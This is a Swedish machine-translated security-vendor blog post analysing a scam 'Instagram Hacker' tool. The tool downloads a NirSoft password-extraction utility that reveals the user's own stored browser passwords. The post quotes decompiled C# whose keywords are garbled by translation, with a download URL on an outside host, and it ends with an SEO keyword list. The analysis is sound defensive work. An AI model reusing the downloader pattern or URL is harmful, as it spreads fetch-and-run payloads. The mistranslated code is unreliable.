Läsningstid: 4 minuter
Många tar inte potentiellt oönskade applikationer (PUA) som en allvarlig fara. Anledningen till en sådan hänsynslös inställning är att PUA vanligtvis installeras med användarens samtycke. Men denna åsikt är ett stort misstag. Och inte bara för att en PUA kan hemmligt installera andra program som adware eller spyware på en nedladdningsbasis. Det levande exemplet nedan analyserad av Comodo Threat Research Labs experter visar tydligt att en PUA kan vara ett mycket mer hotande vapen.
Möt programvaran med namnet “Instagram Hacker”. Den har den officiella webbplatsen https://hackinstagram.net/ och lovar ... att hacka alla Instagram-konton. Mer av det, du kan ladda ner och installera det gratis.
Efter installationen uppmanas den att ange en Instagram-profil-URL och hacka lösenordet.
Resultatet kommer på några sekunder:
Men efter att du har klickat på knappen "Visa lösenord" visas ett nytt fönster:
Om du klickar på knappen "Skaffa en aktiveringskod" omdirigeras till "Köp-sidan".
Det erbjuder att köpa "Aktiveringskod" men ... kan du känna ett bedrägeri i luften? Det är uppenbart att det inte finns någon programvara som kan bryta ett Instagram-lösenord i sekunder. Så är Instagram Hacker bara ett lurande verktyg för att lura förenklingar? Det bästa sättet att kontrollera det är att titta in i applikationskoden.
Koden är skyddad med Dotnet Reactor men kan avkodas med de4dot-verktyget.
Och nu kan vi säkert se att applikationen är ett bedrägeri. Det första kodfragmentet förfalskar bara indikatorn för framstegsdemonstration.
Men en annan är mer intressant. Som du kan se innehåller den en URL med en körbar nedladdning om aktiveringen lyckades.
LoadingWindow ()
{
Klass2.qDiUy7EzyuIMj ();
this.filename = "view.exe";
this.uri = nya Uri (“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent ();
om (File.Exists (denna filnamn))
{
File.Delete (detta filnamn);
}
prova
{
WebClient client1 = ny WebClient ();
client1.DownloadFileAsync (this.uri, this.filename);
client1.DownloadProgressChanged + = ny DownloadProgressChangedEventHandler (this.method_1);
client1.DownloadFileCompleted + = ny AsyncCompletedEventHandler (this.method_2);
}
fångst
{
this.method_0 ();
}
}
}
}
Om vi kör den körbara filen får vi reda på att det är WebBrowserPassView-programmet från NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView är bara ett verktyg för att extrahera lösenord som avslöjar de lösenord som lagrats av webbläsarna. Så alla lösenord som denna programvara kan extrahera är inte Instagram utan användarnas egna lösenord som finns i sina webbläsare!
Låt oss återuppta: allt som Instagram Hacker gör är att ladda ner och starta ytterligare en PUA från NirSoft. Så vi står uppenbarligen inför ett bedrägeriverktyg. Lägg märke till det manipulerande psykologiska tricket här: om ett offer upptäcker att hon blev lurad rapporterar hon knappt polisen om händelsen. För i så fall skulle hon behöva erkänna att hon försökte hacka Instagram, det är en handling att begå cyberbrott.
Men det är en tunn kant av kanten.
Det farligaste hotet är att webbadressen i applikationen enkelt kan ändras på alla andra med en skadlig fil som körs på offrets maskin. Så denna PUA - liksom många andra exempel på sådan skadlig kod - kan användas för massiv spridning av olika "tunga" skadliga program som trojaner, bakdörrar, Ransomware och så vidare
Och det här är en bra anledning att ta PUA som riktigt farlig skadlig kod. Eftersom det kan visa sig vara en språngbräda för en förödande massiv cyberattack.
”Idag ska vi inte överväga malware som farligt eller inte så farligt, säger Fatih Orhan, chef för Comodo Threat Research Labs. "Några malware existerar inte i ett isolerat utrymme. Numera bygger cyberbrottslingar långa malware-kedjor för att attackera användare, och som du kan se kan PUA vara en länk i en sådan dödande kedja. Så vi borde kalla spade för en spade. Ja, dessa applikationer laddas ner och körs med användarens godkännande, men som i det här fallet utpressas godkännandet av bedrägeri. Under potentiellt oönskade applikationer låtsas vara legitima, alla måste förstå att det bara är en kamouflage. Därför tillhandahåller Comodo inte bara avancerat tekniskt skydd utan informerar regelbundet användarna om att förhindra dem från farliga fällor i cyberspace ”.
Lev säkert med Comodo!
Relaterade resurser
Wikipedia DDOS-attack
Borttagning av skadlig kod
Webbplats Malware Scanner
Bästa webbplats säkerhet
Word Security
PÅBÖRJA GRATIS FÖRSÖKSPERIOD FÅ DIN Omedelbara säkerhetskort GRATIS
- SEO-drivet innehåll och PR-distribution. Bli förstärkt idag.
- Platoblockchain. Web3 Metaverse Intelligence. Kunskap förstärkt. Tillgång här.
- Källa: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- Able
- Om oss
- Konto
- Agera
- aktivering
- Efter
- LUFT
- Alla
- och
- Annan
- Ansökan
- tillämpningar
- godkännande
- attackera
- attityd
- Bakdörrar
- grund
- därför att
- BÄST
- Stor
- Blogg
- Ha sönder
- webbläsare
- SLUTRESULTAT
- Knappen
- Köp
- Ring
- Vid
- kedja
- kedjor
- ta
- klart
- koda
- begå
- samtycke
- Tänk
- innehåller
- Cyber attack
- cyberbrottslighet
- nätbrottslingar
- FARA
- Dangerous
- DDoS
- förödande
- upptäcker
- inte
- dubbla
- ladda ner
- lätt
- kant
- ange
- etc
- händelse
- exempel
- exempel
- experter
- extrahera
- Ansikte
- få
- Fil
- hitta
- Förnamn
- bedrägeri
- Fri
- från
- skaffa sig
- god
- större
- hacka
- Hackaren
- huvud
- här.
- Hur ser din drömresa ut
- How To
- html
- HTTPS
- in
- incident
- Indikator
- installera
- omedelbar
- intressant
- isolerat
- IT
- Labs
- lansera
- LINK
- Lång
- se
- Maskinen
- malware
- Malware attack
- många
- massiv
- max-bredd
- misstag
- mer
- mest
- Som heter
- behov
- Nya
- Uppenbara
- Erbjudanden
- tjänsteman
- Officiell hemsida
- ONE
- Yttrande
- Övriga
- egen
- Lösenord
- lösenord
- Personer
- PHP
- plato
- Platon Data Intelligence
- PlatonData
- Polisen
- potentiellt
- förhindra
- Profil
- Program
- Framsteg
- lovar
- skyddad
- skydd
- ge
- inser
- Anledningen
- hänsynslös
- regelbundet
- Rapport
- forskning
- resultera
- Fortsätt
- avslöjar
- Befria
- Körning
- score-kort
- sekunder
- säkra
- säkerhet
- allvarlig
- skall
- So
- Mjukvara
- Utrymme
- spionprogram
- lagras
- framgångsrik
- sådana
- Ta
- Teknisk
- Smakämnen
- deras
- hot
- hela
- tid
- till
- verktyg
- fällor
- SVÄNG
- förstå
- oönskade
- URL
- Användare
- användare
- vanligen
- olika
- Victim
- utsikt
- webb
- webbläsare
- Webbplats
- kommer
- skulle
- Om er
- Din
- zephyrnet